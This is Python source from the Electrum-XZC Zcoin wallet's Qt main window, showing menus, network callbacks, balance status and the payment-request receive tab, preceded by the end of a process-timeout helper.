pipe.send(result)
parent_pipe, child_pipe = Pipe()
p = Process(target=pmain, args=(child_pipe, self.func, args, kargs))
p.start()
p.join(self.timeout)
result = None
if p.is_alive():
p.terminate()
raise TimeoutError
result = parent_pipe.recv()
return result
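# Illustrative usage sketch (not part of the original module). The wrapped
# callable runs in a child process and gets at most `timeout` seconds; if it
# is still alive after the join it is terminated and TimeoutError is raised.
# A callable that raises internally yields a result of None.
#
#     guarded = Timeout(some_slow_function, timeout=5.0)  # some_slow_function is hypothetical
#     result = guarded(arg1, key=value)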
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_xzc.util import bh2u, bfh
from electrum_xzc import keystore, simple_config
from electrum_xzc.bitcoin import COIN, is_address, TYPE_ADDRESS, NetworkConstants
from electrum_xzc.plugins import run_hook
from electrum_xzc.i18n import _
from electrum_xzc.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates)
from electrum_xzc import Transaction
from electrum_xzc import util, bitcoin, commands, coinchooser
from electrum_xzc import paymentrequest
from electrum_xzc.wallet import Multisig_Wallet
try:
from electrum_xzc.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
from electrum_xzc.util import profiler
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_xzc.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-xzc.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once the GUI has been initialized, check whether we want to announce something, since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-XZC Testnet" if NetworkConstants.TESTNET else "Electrum-XZC"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend zcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request zcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction("Export", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# "Settings" / "Preferences" are reserved keywords on OSX; using a different label here as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum-xzc.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('zcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-XZC",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Zcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Zcoin system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/sn-ntu/electrum-xzc/issues\">https://github.com/sn-ntu/electrum-xzc/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-XZC - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-XZC", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-XZC", message, QSystemTrayIcon.Information, 20000)
# Custom wrappers for getOpenFileName and getSaveFileName that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
if self.fee_unit == 0:
return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte'
else:
return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 5:
return 'mXZC'
if self.decimal_point == 8:
return 'XZC'
raise Exception('Unknown base unit')
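# Descriptive note on connect_fields below: editing either the coin amount
# field or its fiat twin updates the other through the current exchange rate;
# the is_last_edited flag lets on_fx_quotes re-drive the pair when a new rate
# arrives, and an attached fee edit triggers window.update_fee() when the coin
# amount is set from the fiat side.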
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Zcoin address where the payment should be received. Note that each payment request uses a different Zcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Zcoin addresses.'),
_('The Zcoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
